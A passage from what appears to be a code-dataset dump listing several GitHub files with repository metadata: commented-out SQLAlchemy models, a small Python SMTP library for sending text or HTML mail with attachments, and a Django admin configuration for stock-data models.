# content = db.Column(db.text, nullable=False)
#
#
# class Comment(db.Model):
# __tablename__ = 'comments'
# id = db.Column(db.Integer, primary_key=True, autoincrement=True)
# name = db.Column(db.String(50), nullable=False)
# content = db.Column(db.text, nullable=False)
| [
"email@1101186901.com"
] | email@1101186901.com |
3263908d9d30879e4febda3d96c3f7a74b399214 | 9a21850ff752b6bd148a9dfbadd210419c2d4a6e | /posts/posts.py | 39bb7bcbfa0e3cbcd84aaeef44c77b06619a2603 | [
"LicenseRef-scancode-unknown-license-reference",
"BSD-2-Clause"
] | permissive | importcjj/Posts | 7d3a9a04f829e92027c310f0daf8be259d4a91a9 | fc2abe1c48fa09af820a25c4cc00520253a6b7f1 | refs/heads/master | 2021-01-10T09:43:07.401682 | 2016-04-20T05:24:36 | 2016-04-20T05:24:36 | 49,366,691 | 5 | 1 | null | null | null | null | UTF-8 | Python | false | false | 3,705 | py | # -*- coding: utf-8 -*-
import smtplib
import socket
from contextlib import contextmanager
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
from email.mime.application import MIMEApplication
class PostSMTP(smtplib.SMTP):
def __init__(self, sender, alias=None, host='', port=0,
local_hostname=None, timeout=socket._GLOBAL_DEFAULT_TIMEOUT):
smtplib.SMTP.__init__(self, host, port, local_hostname, timeout)
self._sender = sender
self._sender_alias = alias if alias else sender.split('@')[0]
self._attachments = {}
self._mails = []
def attach(self, attachments):
"""Add attachments.
Args:
attachments (dict): attachments
example: {'alias_name': 'path/to/filename'}
Returns:
obj to support chain calling.
"""
try:
iteritems = attachments.iteritems()
except AttributeError:
iteritems = attachments.items()
for k, v in iteritems:
self._attachments[k] = v
return self
def _header(self, msg, recipient, subject):
msg['Subject'] = subject
msg['From'] = '{} <{}>'.format(self._sender_alias, self._sender)
msg['To'] = ', '.\
join(recipient) if isinstance(recipient, list) else recipient
return msg
def _mount(self, mail, files):
for _ in files:
mail['msg'].attach(_)
return mail
def _load_files(self):
files = []
try:
iteritems = self._attachments.iteritems()
except AttributeError:
iteritems = self._attachments.items()
for k, v in iteritems:
with open(v, 'rb') as f:
part = MIMEApplication(f.read())
part.add_header('Content-Disposition', 'attachment', filename=k)
part.add_header('Content-ID', '<{}>'.format(k))
files.append(part)
return files
def text(self, recipient, subject, content, charset='us-ascii'):
_text = MIMEText(content, _subtype='plain', _charset=charset)
_msg = MIMEMultipart()
_msg = self._header(_msg, recipient, subject)
_msg.attach(_text)
self._mails.append({
'recipient': recipient,
'msg': _msg
})
return self
def html(self, recipient, subject, content, charset='utf-8'):
_html = MIMEText(content, _subtype='html', _charset=charset)
_msg = MIMEMultipart()
_msg = self._header(_msg, recipient, subject)
_msg.attach(_html)
self._mails.append({
'recipient': recipient,
'msg': _msg
})
return self
def _send(self):
files = self._load_files()
for mail in self._mails:
self._mount(mail, files)
self.sendmail(
self._sender,
mail['recipient'],
mail['msg'].as_string())
class Posts(object):
def __init__(self, host, usermame, password, port=25):
self._host = host
self._port = port
self._username = usermame
self._password = password
@contextmanager
def __call__(self, sender=None, alias=None, ssl=False):
sender = sender if sender else self._username
self._smtp = PostSMTP(sender, alias)
self._smtp.connect(self._host)
if ssl:
self._smtp.ehlo()
self._smtp.starttls()
self._smtp.ehlo()
self._smtp.login(self._username, self._password)
try:
yield self._smtp
self._smtp._send()
finally:
self._smtp.quit()
| [
"importcjj@gmail.com"
] | importcjj@gmail.com |
f8829530e57c7661aff17909cf2af499c0580ec3 | 40f82a8341c7912540644fe5b51dc6e455ea8cb2 | /shares/admin.py | 6a9f67d06537c324008251fffef486777ce9b521 | [] | no_license | persionalWeb/persionalWeb | 3765a3329ba34b4866774dc8167613e4a452043f | e80b1b92a1c55369d1f121d609b90f7edf47d588 | refs/heads/master | 2022-07-07T02:54:19.517215 | 2020-05-17T04:07:02 | 2020-05-17T04:07:02 | 258,783,764 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 605 | py | from django.contrib import admin
from .models import Klins,Stocks
class KlinsAdmin(admin.ModelAdmin):
list_display = ['id','fid', 'code', 'name', 'short_data', 'flag', 'addtime']
search_fields = ['name']
list_filter = ['flag']
list_per_page = 10
ordering = ['id']
class StocksAdmin(admin.ModelAdmin):
list_display = ['id','fid', 'code', 'name', 'industry', 'area', 'price_change', 'pricediff', 'totals', 'short_data', 'addtime']
search_fields = ['name']
list_per_page = 10
ordering = ['id']
admin.site.register(Klins,KlinsAdmin)
admin.site.register(Stocks,StocksAdmin) | [
"63894777+niexingang123@users.noreply.github.com"
] | 63894777+niexingang123@users.noreply.github.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.